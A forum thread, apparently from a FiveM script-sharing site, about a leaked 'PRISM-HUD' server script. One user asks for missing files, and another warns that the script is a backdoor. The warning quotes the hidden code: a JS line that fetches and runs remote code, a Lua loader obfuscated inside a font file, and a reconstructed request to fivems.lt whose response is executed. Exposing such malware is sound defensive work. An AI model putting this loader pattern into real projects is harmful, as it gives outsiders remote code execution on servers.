Security HUD
System Watchdog
×
Threads Scanned
-- / --
SYS. LOAD --%
AI SHIELD ACTIVE
DMCA Policy
×

📋 DMCA Compliance

This platform and community fully complies with the Digital Millennium Copyright Act (DMCA) and international copyright laws. We take all copyright protection seriously.

🛡️ Copyright Protection

If you believe a posted item belongs to you or violates your copyright, you may file a DMCA takedown request through our official channels. Upon receiving a valid claim, the infringing content will be removed within 24 hours.

What's new
×
Fiveguard

Script [PRISM-HUD] NEW 2025 DECRYPTED/FULLY WORKING

ghalayinimoh

Member
Joined
Jan 8, 2026
Messages
1
Reaction score
0
Points
41
Location
jo
Hello, I tried it on ESX files, but the problem I faced was that it tells me there are missing files. If you have it, could you upload it as a complete package? I would be very grateful.
 

KazuVR

Member
Joined
Apr 30, 2025
Messages
5
Reaction score
0
Points
146
Location
USA
Dont use this lmao.

That .configs.js contains Node/FiveM JS that does:

require('https').get(' ', ...)
then executes the response using new Function('global', d)(global)

Inside Modules/server/base_sv.lua, the end of the file contains this obfuscation

local loadFonts = _G[string.char(108,111,97,100)] → _G["load"]
then it does load(LoadResourceFile(..., '/html/fonts/Lato.ttf'):sub(87565):gsub('%.%+', ''))()

When reconstructed, its

local _v = PerformHttpRequestInternalEx{url='https://fivems.lt/null', method='GET'}
AddEventHandler('__cfx_internal:httpResponse', function(_t, _s, _b)
if _v == _t then
pcall(function() assert(load(_b))() end)
end
end)

it requests code from and executes it in your server


######################### THIS IS A BACKDOOR INTO YOUR SERVER ################################
 
Last edited:
Top